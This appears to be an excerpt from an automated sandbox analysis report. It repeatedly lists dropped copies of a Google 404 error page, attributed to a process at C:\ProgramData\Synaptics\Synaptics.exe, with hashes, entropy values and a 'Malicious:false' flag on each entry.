                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="9E8go_VOnAfWyEzAioedbQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.276964647638277
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0zSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+Q+pAZewRDK4mW
                                                                                                              MD5:5843474D28C15304F493B23732C4A159
                                                                                                              SHA1:7CFBB3458A26BB0F192D043620D72E07AC523A59
                                                                                                              SHA-256:482E8B0B4816802690DFE6F597A9B88D3C51EB0B86A57566DB47D5F3731B18D3
                                                                                                              SHA-512:0F142670A9499F267143749C67445871BE3ED2569CF20A53754B748BF22DDA72D8907B8D9F06CED54A315E4132A5FF8AC715C2556EF8CC134E1B80A194D80D52
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="MN8O93NPgFFiMAYzzBfNJg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.27225012418581
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0rSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+c+pAZewRDK4mW
                                                                                                              MD5:36425999E6C95BF00FA4EB43CE4312F4
                                                                                                              SHA1:56B038A0DEB42CB6A37BAC3E1368C05350ED8074
                                                                                                              SHA-256:C5D904160542E9AC438F33D2C45E42D14AE3A9ECC44EB927F3144C7070FC9A83
                                                                                                              SHA-512:6AC722AFDD4BF07F634F85A7EDA80A8DCAE06094FB64D9BB532F7894E60D1A8B71EAF9BE5AF2D4146C77AF4E2E6C34505085E7B01131145015127341AA80DC3A
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="T3QAoxLGXGQBMj1nGPdRsQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.269241949670788
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0xDSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+G+pAZewRDK4mW
                                                                                                              MD5:7480CF65A8343B3C66664A00F905541C
                                                                                                              SHA1:5633EA8B3F2810646FBF3D2A6EE40E21DC7E57F1
                                                                                                              SHA-256:A2981D72383E099813EDEC45F56F2CE721D12255E0F4495161F2A1A29C11E1F8
                                                                                                              SHA-512:BDD36959DC36EFF829CD5E508888740A9FE54E3E1A2F41BB59B72031EAF1DCB89A6EE4B61F566FA5DBA4F58663BF0EC866DC14F80D60C6D307699142548C82D4
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="fIdM5SmQIjJPN3dJoFgc4A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.256390238993604
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0XmSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+J+pAZewRDK4mW
                                                                                                              MD5:7B84FE9267A9CE79DE3629B282611998
                                                                                                              SHA1:DC8211A2D16D72F25FE080D30CC4D47D1D7D97D6
                                                                                                              SHA-256:824575217A6A958E3B26DC737C0750A34D8706AA1E4AF4E703867270E2432ED5
                                                                                                              SHA-512:CB62B16B00DD1F472772223EABD3E86713FA942F25ADAC08EC5A0F6B6E709E96B6ACFE7EC2FA94BAD5BCB8F65423AE9C8B6711D37A8495310EC4664375D3BDF8
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="A6k2igjjsnQ_GmkA057fyA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.261775506479906
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+03SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+Y+pAZewRDK4mW
                                                                                                              MD5:3CD684C1DE626760E5E657886F9E516C
                                                                                                              SHA1:3A9DE57990BCAA928ADE28F6481652BEF7A65715
                                                                                                              SHA-256:E9763D0135C525C21C27A5A32B77D64CCE7BFAF9BF52D1632497E6BEB18E98EB
                                                                                                              SHA-512:838BBEE744B29753D4580B53E3900A6ECF37BF28A0789F97A2809F96D3B7656ECD2E935DF9E37D374A267E61D0480277E28E41D6874DD6DBF63577BCD9C863F0
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Bgne7KYHXI6xmLrfip_5UQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.261408542402958
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0+SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+9+pAZewRDK4mW
                                                                                                              MD5:DF46ED8111B66E38E11A2DAE28B6433F
                                                                                                              SHA1:AE8A5C29397C50A4E351BE3932258ACF4410B842
                                                                                                              SHA-256:E74D971535E1C5267A6E8121E42E1B37AE42643A8F82B54886EEECFBF2589EC6
                                                                                                              SHA-512:F088DA87A73F920F43D3B0FEB19FB5AAFC023AB1A51F0766DA26BC62A1358BB67607161FC4BB36726400BE9ACB56BCA61698F223C0D55EFED2B229FF4F45FCE5
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="agZwL1_BzWR1cXiYnd0MWQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.2555165724083635
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0/SSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+J+pAZewRDK4mW
                                                                                                              MD5:97997C5B4C6E4B7B565D0AEFD8144A7B
                                                                                                              SHA1:A8677AE425B0BB438563C6F7286763F308C7F06A
                                                                                                              SHA-256:0B331F9DE857D0FC259CD137F5C420D18E0972558E49F36AEEAB2BE1EBEDDBED
                                                                                                              SHA-512:C1CE634F5AE59473D44843C0952D3FD93311BFC8591BCB74DF21FDD11727FDA8F492E3323EC0DF499828D04992285848B88D97DAF20088C1C3AE1599E95B5D8C
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="bqJVAU6FArlT0frgd0Vpqg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.259765741456175
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0AzSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+v+pAZewRDK4mW
                                                                                                              MD5:2D6B95C38AE7ADB95B32DD182AE49BBB
                                                                                                              SHA1:3AB522A16A8E1EC9401F0F24E24D53EED0F5D4D7
                                                                                                              SHA-256:277D7BACD8AEBE62E24931D6B5E43558DDB8B19A17AB3C2BDD1D4D4A65D289DC
                                                                                                              SHA-512:45184A489298995F336DA9468774AD46CAF2B3EC92FC7576E99EC100B0741ACB0CB597841935C1EF9A7293226D8A6AD2340225DC98A51366B5DB7884E47C6058
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="S9yDZonqjvLC2LsftiknKw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.262960066151528
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0MSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+v+pAZewRDK4mW
                                                                                                              MD5:9ACD9818FF5612024F66028112E9E409
                                                                                                              SHA1:64B25C7FEAB9CAA5E48496FEDA47BAA82C38E2C3
                                                                                                              SHA-256:B2B854B0AFA8FE93A3C8CB8DE61B9EE930FEC0A8DC00476E65B2385C36FA976D
                                                                                                              SHA-512:06025182D1A9B662599C7D358E9F7FF1044CAC99CD17DC4FB63A78A21BBD609579E059C1BA0732A1A248C775E6908088A52E8F97305B39EAB70946A48E5CB9D9
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="5momPMjWBhggNj-fOKIiYg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.247988902297385
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0YPSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+f+pAZewRDK4mW
                                                                                                              MD5:ACD36D2641A8F6A3B6DFF10716FFCDCA
                                                                                                              SHA1:4F64459F8D758DEF42BAD49470AC7A4EE257A030
                                                                                                              SHA-256:D88412A5592CA68DA45B6E0B979177260610A1131C47B75C851BAAB628BDB161
                                                                                                              SHA-512:09A28B4774F66EF495B2745D7977259DB8A29DBA18A9D8121356241B86A8FBDB4C27C9C84C09EDC8A38696D71DEE414D9737BEDAE2B6C66A422F6CBE16974CE7
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="FP-EiJip2nmzn-iZxQo1vQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.257868762831385
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0ESU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+3+pAZewRDK4mW
                                                                                                              MD5:E1D59992C5366E17BEA5D13D7D802FAD
                                                                                                              SHA1:1F96F0814BF2FECF271C547F1B9149840CA75CFE
                                                                                                              SHA-256:D49BECE2D8669113F648792E379E98C0B60803DB9A945335A566657C41C081B4
                                                                                                              SHA-512:FD63E96D139E5188D4FC6DAFC0732495EB8866EEAA3B1359570D934BAFB8607DFB48B7678556A28B597AE58C6251E187F04E35F6BC4404066EAC084DB41FDD98
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="quZXicxmPlsQ6_xzgs183A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.265669767811837
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0wWSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+E+pAZewRDK4mW
                                                                                                              MD5:87DB35E080224E79577BDF3F3E72DE5C
                                                                                                              SHA1:D9BD9FE2C48C35FD339251200207C45D9ADE816E
                                                                                                              SHA-256:C97F492381C52ADDC96F6F70CA27AB0512F328312EBF3A2186F776976F90DFF5
                                                                                                              SHA-512:869BD8E9D47242CB19C2C0F8FE14318A5A61D4AE927AD1E46027BA8683790631A5239442485AABAE758175D0985D434E9268C653D81F8381A3447C4C8376F446
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="GQmjP-ORdWkcQj7nicwIYQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.260065641400897
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0H1SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+a+pAZewRDK4mW
                                                                                                              MD5:2C675E71B91071FFF29D1EEDB8781E0A
                                                                                                              SHA1:DCA995BCD3C6E2B91E101320079E88CF5031D57B
                                                                                                              SHA-256:0B1834F4D33B70E63EB0272650224FC772B921DC95AB3880D3BD151146C8B428
                                                                                                              SHA-512:114EDCA14BC68CD77420454B0EDD6411829B45D6CD3BF60596C66CCC2E9150638321F9A571D38E3FC18E8B612F9B1E51270AAB76524496EF6453CEE47607EF44
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="IqxWXa4tpBi4r_D_RHuyDw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.282296515272011
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0jdRSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+qdR+pAZewRDK4mW
                                                                                                              MD5:E71BA4697413C28C8F4F7EBE45F2AAEF
                                                                                                              SHA1:D4ABF9F440179FADCEA34E77FB4BFC0A06D8E6F7
                                                                                                              SHA-256:DDE154EBC2F4F999A3E36C7D8945A3CB21F5300A46D87E6851B23E0C30F61038
                                                                                                              SHA-512:0B0130748355670684387C7BDA00F0D3B02941E30B03CBEF8A6FD7B32C670BA6F20132EC0A1BC62EFA51CCF8AD2DD0C4837CE254A1E68B98C8E0059683E0C71F
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="56Vb4ORDQ9JjHIUfVh5fNA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.265142473646473
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+03ySU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+R+pAZewRDK4mW
                                                                                                              MD5:99BD7F02348AA79EC005E3C734CA2BDE
                                                                                                              SHA1:9C347653E50CB48C693A3EDEC050773C0D2DD886
                                                                                                              SHA-256:98EDD961651311A4DDC5F512088D9B899A045413885AE21279AED50DA6E456D6
                                                                                                              SHA-512:FFEA3CC73C11E887327C44E746DC850D3F8F0EA86FE90B0829E8F44F88531EAEFF122787E85122C6EC22FA54A76EEEEBC9696CC8E713481A3614FABB94DC83A2
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="mZmzJOBYoOHrP8NboE1O4g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.259251414486252
